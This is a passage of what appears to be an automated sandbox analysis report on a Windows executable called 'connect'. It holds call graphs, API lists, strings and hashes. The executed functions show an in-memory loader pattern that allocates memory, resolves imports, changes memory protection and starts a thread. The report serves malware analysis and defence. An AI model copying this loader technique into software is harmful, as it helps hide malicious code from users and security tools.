std::locale::_Locimp::~_Locimp 14602->14585 14603 403228 std::locale::_Locimp::~_Locimp 14603->14602 14604 403e20 std::locale::_Locimp::~_Locimp 67 API calls 14603->14604 14604->14602 14606 402ed1 std::runtime_error::runtime_error 14605->14606 14608 402edb std::runtime_error::runtime_error 14606->14608 14627 4078d4 14606->14627 14609 402f24 14608->14609 14610 402eff 14608->14610 14612 403360 std::locale::_Init 75 API calls 14609->14612 14635 403270 14610->14635 14616 402f32 std::locale::_Locimp::~_Locimp 14612->14616 14613 402f14 14614 403270 std::runtime_error::runtime_error 75 API calls 14613->14614 14615 402f22 std::locale::_Locimp::~_Locimp 14614->14615 14615->14602 14616->14615 14617 403e20 std::locale::_Locimp::~_Locimp 67 API calls 14616->14617 14617->14615 14619 403371 std::locale::_Init 14618->14619 14620 40337b 14619->14620 14641 40789c 14619->14641 14622 403386 14620->14622 14625 40339b 14620->14625 14649 403670 14622->14649 14624 403399 std::locale::_Locimp::~_Locimp 14624->14603 14625->14624 14626 402aa0 std::locale::_Locimp::~_Locimp 67 API calls 14625->14626 14626->14624 14628 4078e0 __EH_prolog3 14627->14628 14629 4024e0 std::_String_base::_Xlen 75 API calls 14628->14629 14630 4078ed 14629->14630 14631 40784d std::bad_exception::bad_exception 75 API calls 14630->14631 14632 4078fd 14631->14632 14633 40898b __CxxThrowException@8 RaiseException 14632->14633 14634 40790b 14633->14634 14636 403284 14635->14636 14638 403289 std::locale::_Locimp::~_Locimp 14635->14638 14637 4078d4 std::runtime_error::runtime_error 75 API calls 14636->14637 14637->14638 14639 403e50 std::runtime_error::runtime_error 67 API calls 14638->14639 14640 4032e0 std::locale::_Locimp::~_Locimp 14638->14640 14639->14640 14640->14613 14642 4078a8 __EH_prolog3 14641->14642 14643 4024e0 std::_String_base::_Xlen 75 API calls 14642->14643 14644 4078b5 14643->14644 14645 4077fe std::bad_exception::bad_exception 75 API calls 14644->14645 14646 4078c5 14645->14646 14647 40898b __CxxThrowException@8 RaiseException 14646->14647 14648 4078d3 14647->14648 14650 4036a6 std::locale::_Init 14649->14650 14651 403820 allocator 75 API calls 14650->14651 14652 403713 std::locale::_Locimp::~_Locimp 14651->14652 14655 403e20 std::locale::_Locimp::~_Locimp 67 API calls 14652->14655 14656 403799 14652->14656 14653 402aa0 std::locale::_Locimp::~_Locimp 67 API calls 14654 4037a8 std::locale::_Locimp::~_Locimp 14653->14654 14654->14624 14655->14656 14656->14653 14658 402dbf std::runtime_error::runtime_error 14657->14658 14661 402e60 14658->14661 14662 402e73 _DebugHeapAllocator 14661->14662 14663 402aa0 std::locale::_Locimp::~_Locimp 67 API calls 14662->14663 14664 402e7f 14663->14664 14665 402ec0 std::runtime_error::runtime_error 75 API calls 14664->14665 14666 402c0d 14665->14666 14666->14551 14668 40349c 14667->14668 14669 4034a9 14668->14669 14670 402950 75 API calls 14668->14670 14669->14509 14670->14669 14673 4035eb 14671->14673 14672 403145 14672->14461 14673->14672 14675 403610 14673->14675 14678 4079bf 14675->14678 14681 408148 LeaveCriticalSection 14678->14681 14680 403622 14680->14672 14681->14680 14707 4027a0 14682->14707 14685 403c60 14686 40773c std::_Lockit::_Lockit EnterCriticalSection 14685->14686 14687 403c70 14686->14687 14725 403d20 14687->14725 14689 403c82 std::locale::_Getfacet 14702 403c9a 14689->14702 14731 403fb0 14689->14731 14690 407764 std::locale::_Init LeaveCriticalSection 14693 4025c7 14690->14693 14703 4026d0 14693->14703 14694 403cdc 14697 4027d0 std::locale::facet::_Incref 2 API calls 14694->14697 14695 403cbf 14745 408b29 14695->14745 14699 403cf9 14697->14699 14748 403d70 14699->14748 14700 40898b __CxxThrowException@8 RaiseException 14700->14702 14702->14690 14704 4026e1 14703->14704 14705 4026eb 14703->14705 15128 402720 14704->15128 14705->14473 14710 4027d0 14707->14710 14715 40773c 14710->14715 14716 4027e3 14715->14716 14717 40774e 14715->14717 14719 407764 14716->14719 14723 408138 EnterCriticalSection 14717->14723 14720 4025c1 14719->14720 14721 40776b 14719->14721 14720->14685 14724 408148 LeaveCriticalSection 14721->14724 14723->14716 14724->14720 14726 403d31 14725->14726 14727 403d65 14725->14727 14728 40773c std::_Lockit::_Lockit EnterCriticalSection 14726->14728 14727->14689 14729 403d3b 14728->14729 14730 407764 std::locale::_Init LeaveCriticalSection 14729->14730 14730->14727 14732 403cb7 14731->14732 14733 403fcd 14731->14733 14732->14694 14732->14695 14733->14732 14751 40a25d 14733->14751 14736 40401d 14738 404054 14736->14738 14783 4040e0 14736->14783 14738->14732 14742 402520 std::runtime_error::~runtime_error 67 API calls 14738->14742 14742->14732 15047 408a39 14745->15047 15053 407b2a 14748->15053 14754 40a267 14751->14754 14752 408389 _malloc 67 API calls 14752->14754 14753 403fe0 14753->14736 14763 404130 14753->14763 14754->14752 14754->14753 14755 4105dc _realloc 6 API calls 14754->14755 14758 40a283 std::locale::_Init 14754->14758 14755->14754 14756 40a2a9 14796 403f50 14756->14796 14758->14756 14761 40b4c2 _AtModuleExit 74 API calls 14758->14761 14760 40898b __CxxThrowException@8 RaiseException 14762 40a2c1 14760->14762 14761->14756 14764 402e60 std::runtime_error::runtime_error 75 API calls 14763->14764 14765 403ffd 14764->14765 14766 404080 14765->14766 14767 40773c std::_Lockit::_Lockit EnterCriticalSection 14766->14767 14768 404091 14767->14768 14805 404160 14768->14805 14771 404160 codecvt 67 API calls 14772 4040a7 14771->14772 14773 404160 codecvt 67 API calls 14772->14773 14774 4040b2 14773->14774 14775 404160 codecvt 67 API calls 14774->14775 14776 4040bd 14775->14776 14809 407cd1 14776->14809 14779 404190 14780 4041a3 std::locale::facet::facet 14779->14780 15022 405fc0 14780->15022 15043 407b68 14783->15043 14786 402520 std::runtime_error::~runtime_error 67 API calls 14787 4040fe 14786->14787 14788 402520 std::runtime_error::~runtime_error 67 API calls 14787->14788 14789 404109 14788->14789 14790 402520 std::runtime_error::~runtime_error 67 API calls 14789->14790 14791 404114 14790->14791 14792 402520 std::runtime_error::~runtime_error 67 API calls 14791->14792 14793 40411f 14792->14793 14794 407764 std::locale::_Init LeaveCriticalSection 14793->14794 14795 404127 14794->14795 14795->14738 14799 408aa9 14796->14799 14800 408ac9 _strlen 14799->14800 14804 403f63 14799->14804 14801 408389 _malloc 67 API calls 14800->14801 14800->14804 14802 408adc 14801->14802 14803 410d88 _strcpy_s 67 API calls 14802->14803 14802->14804 14803->14804 14804->14760 14806 404171 std::_String_base::_Xlen 14805->14806 14807 402aa0 std::locale::_Locimp::~_Locimp 67 API calls 14806->14807 14808 40409c 14807->14808 14808->14771 14810 407ce1 14809->14810 14819 40d372 14810->14819 14812 407cf2 14813 402a50 std::locale::_Init 75 API calls 14812->14813 14814 407d09 14813->14814 14815 40d372 _setlocale 118 API calls 14814->14815 14816 407d15 14814->14816 14815->14816 14817 402a50 std::locale::_Init 75 API calls 14816->14817 14818 40400d 14817->14818 14818->14779 14820 40d37e _raise 14819->14820 14821 40d3a8 14820->14821 14822 40d389 14820->14822 14824 4108cb __getptd 67 API calls 14821->14824 14823 40d524 ___strgtold12_l 67 API calls 14822->14823 14825 40d38e 14823->14825 14826 40d3ad 14824->14826 14827 40a597 ___strgtold12_l 6 API calls 14825->14827 14828 40c746 ____lc_handle_func 75 API calls 14826->14828 14832 40d39e _raise _setlocale 14827->14832 14829 40d3b7 14828->14829 14830 40e34a __calloc_crt 67 API calls 14829->14830 14831 40d3ca 14830->14831 14831->14832 14833 40f225 __lock 67 API calls 14831->14833 14832->14812 14834 40d3e0 14833->14834 14855 40c6e2 14834->14855 14841 40d413 ___TypeMatch 14844 40f225 __lock 67 API calls 14841->14844 14842 40d4b7 14843 40c649 ___removelocaleref 8 API calls 14842->14843 14845 40d4bd 14843->14845 14846 40d43c 14844->14846 14847 40c471 __freefls@4 67 API calls 14845->14847 14848 40c708 _setlocale 75 API calls 14846->14848 14847->14832 14849 40d44e 14848->14849 14850 40c649 ___removelocaleref 8 API calls 14849->14850 14851 40d454 14850->14851 14853 40c708 _setlocale 75 API calls 14851->14853 14854 40d470 _sync_legacy_variables_lk _realloc 14851->14854 14853->14854 14879 40d4ac 14854->14879 14856 40c6eb 14855->14856 14858 40c704 14855->14858 14857 40c5ba ___addlocaleref 8 API calls 14856->14857 14856->14858 14857->14858 14859 40d4a0 14858->14859 14882 40f14b LeaveCriticalSection 14859->14882 14861 40d3fa 14862 40d157 14861->14862 14863 40d180 14862->14863 14869 40d19c 14862->14869 14871 40d18a 14863->14871 14883 40ce55 14863->14883 14866 40d2ed 14907 40cc24 14866->14907 14868 40a7da ___getlocaleinfo 5 API calls 14870 40d370 14868->14870 14869->14866 14875 40d2d3 14869->14875 14876 40d1d1 _strpbrk _strncmp _strlen _strcspn 14869->14876 14870->14841 14870->14842 14871->14868 14872 40d302 ___TypeMatch 14872->14871 14873 40ce55 __setlocale_set_cat 114 API calls 14872->14873 14872->14875 14873->14872 14874 41485b ___getlocaleinfo 67 API calls 14874->14876 14875->14871 14931 40caa7 14875->14931 14876->14871 14876->14874 14876->14875 14877 40a46f __invoke_watson 10 API calls 14876->14877 14878 40ce55 __setlocale_set_cat 114 API calls 14876->14878 14877->14876 14878->14876 15021 40f14b LeaveCriticalSection 14879->15021 14881 40d4b3 14881->14832 14882->14861 14884 4108cb __getptd 67 API calls 14883->14884 14885 40ce73 14884->14885 14886 40cc24 __expandlocale 113 API calls 14885->14886 14887 40ce9e ___TypeMatch _strlen 14886->14887 14890 40e305 __malloc_crt 67 API calls 14887->14890 14901 40cea5 14887->14901 14888 40a7da ___getlocaleinfo 5 API calls 14889 40d155 14888->14889 14889->14871 14891 40cee9 _realloc 14890->14891 14892 410d88 _strcpy_s 67 API calls 14891->14892 14891->14901 14893 40cf5a 14892->14893 14894 40a46f __invoke_watson 10 API calls 14893->14894 14895 40cf6d _realloc 14893->14895 14894->14895 14898 415276 ___crtGetStringTypeA 91 API calls 14895->14898 14905 40d051 _memcmp 14895->14905 14896 40d0c4 14899 40822f ___getlocaleinfo 67 API calls 14896->14899 14897 40d0f5 14900 40d101 InterlockedDecrement 14897->14900 14897->14901 14898->14905 14899->14901 14900->14901 14902 40d119 14900->14902 14901->14888 14903 40822f ___getlocaleinfo 67 API calls 14902->14903 14904 40d120 14903->14904 14906 40822f ___getlocaleinfo 67 API calls 14904->14906 14905->14896 14905->14897 14906->14901 14908 4108cb __getptd 67 API calls 14907->14908 14910 40cc5f 14908->14910 14909 40a7da ___getlocaleinfo 5 API calls 14911 40ce53 14909->14911 14912 40ccae 14910->14912 14915 40ccff ___TypeMatch _strlen 14910->14915 14928 40ccd4 14910->14928 14911->14872 14913 410d88 _strcpy_s 67 API calls 14912->14913 14914 40ccc1 14913->14914 14917 40a46f __invoke_watson 10 API calls 14914->14917 14914->14928 14922 40cdd6 _realloc 14915->14922 14959 40c911 14915->14959 14917->14928 14923 410d88 _strcpy_s 67 API calls 14922->14923 14925 40ce28 14923->14925 14926 40a46f __invoke_watson 10 API calls 14925->14926 14925->14928 14926->14928 14927 41485b ___getlocaleinfo 67 API calls 14929 40cdc3 14927->14929 14928->14909 14929->14922 14930 40a46f __invoke_watson 10 API calls 14929->14930 14930->14922 14932 40e305 __malloc_crt 67 API calls 14931->14932 14933 40cac0 14932->14933 14951 40cbbc 14933->14951 15016 40c8d1 14933->15016 14935 4147e7 _strcat_s 67 API calls 14937 40cafb ___TypeMatch 14935->14937 14936 40a46f __invoke_watson 10 API calls 14936->14937 14937->14935 14937->14936 14938 40c8d1 __strcats 67 API calls 14937->14938 14939 40cb83 14937->14939 14938->14937 14940 40cbd2 14939->14940 14941 40cb89 14939->14941 14943 40822f ___getlocaleinfo 67 API calls 14940->14943 14942 40cb96 InterlockedDecrement 14941->14942 14954 40cba5 14941->14954 14945 40cb9d 14942->14945 14942->14954 14944 40cbda 14943->14944 14947 40cbf9 14944->14947 14948 40cbea InterlockedDecrement 14944->14948 14949 40822f ___getlocaleinfo 67 API calls 14945->14949 14946 40cbad InterlockedDecrement 14950 40cbb4 14946->14950 14946->14951 14947->14951 14953 40cc01 InterlockedDecrement 14947->14953 14948->14947 14952 40cbf1 14948->14952 14949->14954 14955 40822f ___getlocaleinfo 67 API calls 14950->14955 14951->14871 14956 40822f ___getlocaleinfo 67 API calls 14952->14956 14953->14951 14957 40cc08 14953->14957 14954->14946 14954->14951 14955->14951 14956->14947 14958 40822f ___getlocaleinfo 67 API calls 14957->14958 14958->14951 14961 40c92a _memset 14959->14961 14960 40c936 14960->14928 14969 414ecb 14960->14969 14961->14960 14962 40c948 14961->14962 14967 40c975 _strcspn 14961->14967 14963 41485b ___getlocaleinfo 67 API calls 14962->14963 14964 40c959 14963->14964 14964->14960 14965 40a46f __invoke_watson 10 API calls 14964->14965 14965->14960 14966 41485b ___getlocaleinfo 67 API calls 14966->14967 14967->14960 14967->14966 14968 40a46f __invoke_watson 10 API calls 14967->14968 14968->14967 14970 4108cb __getptd 67 API calls 14969->14970 14974 414ed8 14970->14974 14971 414ee7 GetUserDefaultLCID 14996 414f6a 14971->14996 14973 414f13 14975 414f73 14973->14975 14976 414f25 14973->14976 14974->14971 14974->14973 14978 414910 _TranslateName 102 API calls 14974->14978 14975->14971 14980 414f7e _strlen 14975->14980 14979 414f37 14976->14979 14982 414f30 14976->14982 14977 40cd6d 14977->14928 15007 40ca3a 14977->15007 14978->14973 14983 414e8f _GetLcidFromLanguage EnumSystemLocalesA 14979->14983 14987 414f84 EnumSystemLocalesA 14980->14987 14981 414972 _ProcessCodePage 94 API calls 14984 414fd8 14981->14984 14985 414e28 _GetLcidFromLangCountry EnumSystemLocalesA 14982->14985 14986 414f35 14983->14986 14984->14977 14988 414ffd IsValidCodePage 14984->14988 14985->14986 14989 414910 _TranslateName 102 API calls 14986->14989 14986->14996 14987->14996 14988->14977 14990 41500f IsValidLocale 14988->14990 14991 414f53 14989->14991 14990->14977 14992 415022 14990->14992 14993 414f6c 14991->14993 14995 414f65 14991->14995 14991->14996 14992->14977 14997 415053 14992->14997 14998 415078 GetLocaleInfoA 14992->14998 14994 414e8f _GetLcidFromLanguage EnumSystemLocalesA 14993->14994 14994->14996 14999 414e28 _GetLcidFromLangCountry EnumSystemLocalesA 14995->14999 14996->14977 14996->14981 15000 410d88 _strcpy_s 67 API calls 14997->15000 14998->14977 15001 415089 GetLocaleInfoA 14998->15001 14999->14996 15002 415060 15000->15002 15001->14977 15003 41509d 15001->15003 15002->15001 15005 40a46f __invoke_watson 10 API calls 15002->15005 15004 40e4c1 __itoa_s 67 API calls 15003->15004 15004->14977 15006 415073 15005->15006 15006->15001 15008 410d88 _strcpy_s 67 API calls 15007->15008 15009 40ca50 15008->15009 15010 40a46f __invoke_watson 10 API calls 15009->15010 15012 40ca63 15009->15012 15010->15012 15011 40ca80 15014 40caa2 15011->15014 15015 40c8d1 __strcats 67 API calls 15011->15015 15012->15011 15013 40c8d1 __strcats 67 API calls 15012->15013 15013->15011 15014->14927 15015->15014 15017 40c8e1 15016->15017 15020 40c90c 15016->15020 15018 4147e7 _strcat_s 67 API calls 15017->15018 15019 40a46f __invoke_watson 10 API calls 15017->15019 15017->15020 15018->15017 15019->15017 15020->14937 15021->14881 15025 405ff0 15022->15025 15028 407d2d 15025->15028 15033 40d935 15028->15033 15034 4108cb __getptd 67 API calls 15033->15034 15036 40d93a 15034->15036 15035 407d35 15038 40d90f 15035->15038 15036->15035 15037 40c746 ____lc_handle_func 75 API calls 15036->15037 15037->15035 15039 4108cb __getptd 67 API calls 15038->15039 15040 40d914 15039->15040 15041 4041b8 15040->15041 15042 40c746 ____lc_handle_func 75 API calls 15040->15042 15041->14736 15042->15041 15044 407b76 15043->15044 15045 4040f0 15043->15045 15046 40d372 _setlocale 118 API calls 15044->15046 15045->14786 15046->15045 15048 408a52 _strlen 15047->15048 15052 403ccc 15047->15052 15049 408389 _malloc 67 API calls 15048->15049 15050 408a61 15049->15050 15051 410d88 _strcpy_s 67 API calls 15050->15051 15050->15052 15051->15052 15052->14700 15054 407b42 15053->15054 15055 407b38 15053->15055 15057 40a25d std::locale::_Init 75 API calls 15054->15057 15059 4079c8 15055->15059 15058 403d80 15057->15058 15058->14702 15060 40b4c2 _AtModuleExit 74 API calls 15059->15060 15062 4079d5 15060->15062 15061 4079e0 15061->15054 15062->15061 15063 40c380 15062->15063 15064 4103e9 __NMSG_WRITE 67 API calls 15062->15064 15073 4133bb 15063->15073 15064->15063 15067 40c391 _memset 15069 40c469 15067->15069 15071 40c429 SetUnhandledExceptionFilter UnhandledExceptionFilter 15067->15071 15097 410367 15069->15097 15071->15069 15074 41067f __decode_pointer 6 API calls 15073->15074 15075 40c386 15074->15075 15075->15067 15076 4133c8 15075->15076 15079 4133d4 _raise 15076->15079 15077 413430 15078 413411 15077->15078 15082 41343f 15077->15082 15083 41067f __decode_pointer 6 API calls 15078->15083 15079->15077 15079->15078 15080 4133fb 15079->15080 15085 4133f7 15079->15085 15081 410852 __getptd_noexit 67 API calls 15080->15081 15086 413400 _siglookup 15081->15086 15084 40d524 ___strgtold12_l 67 API calls 15082->15084 15083->15086 15087 413444 15084->15087 15085->15080 15085->15082 15089 4134a6 15086->15089 15090 410367 _raise 67 API calls 15086->15090 15091 413409 _raise 15086->15091 15088 40a597 ___strgtold12_l 6 API calls 15087->15088 15088->15091 15092 40f225 __lock 67 API calls 15089->15092 15093 4134b1 15089->15093 15090->15089 15091->15067 15092->15093 15094 410676 _raise 6 API calls 15093->15094 15095 4134e6 15093->15095 15094->15095 15100 41353c 15095->15100 15105 410225 15097->15105 15099 40c470 15101 413542 15100->15101 15102 413549 15100->15102 15104 40f14b LeaveCriticalSection 15101->15104 15102->15091 15104->15102 15106 410231 _raise 15105->15106 15107 40f225 __lock 67 API calls 15106->15107 15108 410238 15107->15108 15109 4102f1 __initterm 15108->15109 15112 41067f __decode_pointer 6 API calls 15108->15112 15122 41033c 15109->15122 15113 41026f 15112->15113 15113->15109 15116 41067f __decode_pointer 6 API calls 15113->15116 15115 410330 15117 410135 _malloc 3 API calls 15115->15117 15120 410284 15116->15120 15118 410339 _raise 15117->15118 15118->15099 15119 410676 6 API calls _raise 15119->15120 15120->15109 15120->15119 15121 41067f 6 API calls __decode_pointer 15120->15121 15121->15120 15123 410342 15122->15123 15124 41031d 15122->15124 15127 40f14b LeaveCriticalSection 15123->15127 15124->15118 15126 40f14b LeaveCriticalSection 15124->15126 15126->15115 15127->15124 15129 40773c std::_Lockit::_Lockit EnterCriticalSection 15128->15129 15130 402733 15129->15130 15131 407764 std::locale::_Init LeaveCriticalSection 15130->15131 15132 40276e 15131->15132 15132->14705

                                                      Executed Functions

                                                      Function 0041C000 Relevance: 19.5, APIs: 9, Strings: 1, Instructions: 2014memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 41c000-41c00c 1 41c013-41c319 call 402050 0->1 2 41c00e 0->2 7 41c325-41c34a 1->7 8 41c31b-41c320 1->8 2->1 3 41c010 2->3 3->1 10 41c358-41c361 7->10 11 41c34c-41c356 7->11 9 41d8ff-41d905 8->9 12 41c367-41c392 VirtualAlloc 10->12 11->12 13 41c394-41c3a3 12->13 14 41c3af-41c5f2 call 4024a0 12->14 13->14 16 41c3a5-41c3aa 13->16 18 41c5f4 14->18 19 41c5f9-41c737 14->19 16->9 18->19 20 41c5f6 18->20 22 41c748-41c758 19->22 20->19 23 41c7a9-41c83c 22->23 24 41c75a-41c7a7 call 4024a0 22->24 26 41c962-41cb26 23->26 27 41c842-41c869 23->27 24->22 28 41cb37-41cb4b 26->28 30 41c873-41c87f 27->30 32 41cb51-41cb8a LoadLibraryA 28->32 33 41cc75 28->33 30->26 31 41c885-41c8c6 30->31 35 41c8d7-41c8e3 31->35 38 41cb8c 32->38 39 41cb8e-41cbb7 32->39 36 41cc77 33->36 37 41cc7c-41ccaf 33->37 40 41c8e5-41c8f4 35->40 41 41c93c-41c95d 35->41 36->37 42 41cc79 36->42 55 41ccb5-41cce4 37->55 56 41cdbb-41d53c GetPEB 37->56 38->28 44 41cbc8-41cbd8 39->44 45 41c8f6-41c928 40->45 46 41c92b-41c93a 40->46 41->30 42->37 48 41cc70 44->48 49 41cbde-41cc24 GetProcAddress 44->49 45->46 46->35 48->33 50 41cc43-41cc6b 49->50 51 41cc26-41cc3d GetProcAddress 49->51 50->44 51->50 59 41cce6-41ccf2 55->59 60 41cd0d-41cd19 55->60 57 41d57d-41d730 CreateThread 56->57 58 41d53e-41d57a call 4024a0 lstrlenW 56->58 64 41d752-41d8fd WaitForSingleObject 57->64 65 41d732-41d74a Sleep call 4024a0 57->65 58->57 59->60 66 41ccf4-41ccff 59->66 61 41cd35-41cd40 60->61 62 41cd1b-41cd27 60->62 68 41cd42-41cd4e 61->68 69 41cd5c-41cd68 61->69 62->61 67 41cd29-41cd33 62->67 64->9 76 41d74f 65->76 66->60 72 41cd01-41cd0b 66->72 73 41cd74-41cdb6 VirtualProtect 67->73 68->69 74 41cd50-41cd5a 68->74 69->73 75 41cd6a 69->75 72->73 74->73 75->73 76->64
                                                      APIs
                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000004), ref: 0041C37F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-3916222277
                                                      • Opcode ID: 112074e21bae201ac19c45c2c3de9d20e6f92633d091a124c34c80f87dd45fa1
                                                      • Instruction ID: c6a081dfb3d1d22671ee0c8c93ac95900cf9cc06b918457006915dd628facda9
                                                      • Opcode Fuzzy Hash: 112074e21bae201ac19c45c2c3de9d20e6f92633d091a124c34c80f87dd45fa1
                                                      • Instruction Fuzzy Hash: 0BD27C37D11B294BE3148A38CC857E4A922EBD9320F51E772D86DDB7D4C63C8D868B85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041E1D0 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 146COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ConsoleFree
                                                      • String ID: Error: Division by zero is not allowed.$Error: Division by zero or non-positive values is not allowed.$Invalid operation.$N$Result: $Result: $Result: $Result: $Result:
                                                      • API String ID: 771614528-2273519392
                                                      • Opcode ID: b3db4885e2fa4081b33188e716fe796380e0d0396435d28f73e5bb278dbab8da
                                                      • Instruction ID: 71462df127c69a59ea29f65e18304f9840dc87bac97ef303429e6d0c1854091c
                                                      • Opcode Fuzzy Hash: b3db4885e2fa4081b33188e716fe796380e0d0396435d28f73e5bb278dbab8da
                                                      • Instruction Fuzzy Hash: 3B4182B0E40618D2CF007BB5AE1F5EDB971BB44709F2005BAE885B21C2EAFD4168436E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041D910 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 203librarymemoryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 135 41d910-41d96b 137 41d971-41dac3 135->137 138 41dac8-41dbab GetModuleHandleA GetProcAddress VirtualProtect 135->138
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(0041FCCC,00000045), ref: 0041DAD2
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041DAD9
                                                      • VirtualProtect.KERNELBASE(Function_0001C000,00001910,00000040,?), ref: 0041DB9F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                      • String ID: =$E$U$b$q
                                                      • API String ID: 2099061454-2355070441
                                                      • Opcode ID: 6e4361986396deaf7f6ed0727193d9d4968c1a3968c8252d14448447d96609d1
                                                      • Instruction ID: 52025b6442cd5ceb9bd7a4aeeeab6d24b33ebd08995b398a6cfcb45825a3e8d5
                                                      • Opcode Fuzzy Hash: 6e4361986396deaf7f6ed0727193d9d4968c1a3968c8252d14448447d96609d1
                                                      • Instruction Fuzzy Hash: B4818260C0D2DC89DF0687FD8856AEDBFF14F6F282F08429AD8D5B62C6C1A84A45C775
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040822F Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 139 40822f-408240 call 40fd1c 142 408242-408249 139->142 143 4082b7-4082bc call 40fd61 139->143 145 40824b-408263 call 40f225 call 40f258 142->145 146 40828e 142->146 156 408265-40826d call 40f288 145->156 157 40826e-40827e call 408285 145->157 148 40828f-40829f RtlFreeHeap 146->148 148->143 150 4082a1-4082b6 call 40d524 GetLastError call 40d4e2 148->150 150->143 156->157 157->143 164 408280-408283 157->164 164->148
                                                      APIs
                                                      • __lock.LIBCMT ref: 0040824D
                                                        • Part of subcall function 0040F225: __mtinitlocknum.LIBCMT ref: 0040F23B
                                                        • Part of subcall function 0040F225: __amsg_exit.LIBCMT ref: 0040F247
                                                        • Part of subcall function 0040F225: EnterCriticalSection.KERNEL32(0041086E,0041086E,?,00415A1F,00000004,00423800,0000000C,0040E360,00000001,0041087D,00000000,00000000,00000000,?,0041087D,00000001), ref: 0040F24F
                                                      • ___sbh_find_block.LIBCMT ref: 00408258
                                                      • ___sbh_free_block.LIBCMT ref: 00408267
                                                      • RtlFreeHeap.NTDLL(00000000,00000001,00423208,0000000C,0040F206,00000000,00423570,0000000C,0040F240,00000001,0041086E,?,00415A1F,00000004,00423800,0000000C), ref: 00408297
                                                      • GetLastError.KERNEL32(?,00415A1F,00000004,00423800,0000000C,0040E360,00000001,0041087D,00000000,00000000,00000000,?,0041087D,00000001,00000214), ref: 004082A8
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.2617272784.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000015.00000002.2617257346.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617293952.000000000041C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617309485.000000000041E000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617326257.000000000041F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000015.00000002.2617381678.000000000047F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_21_2_400000_connect.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                      • String ID:
                                                      • API String ID: 2714421763-0
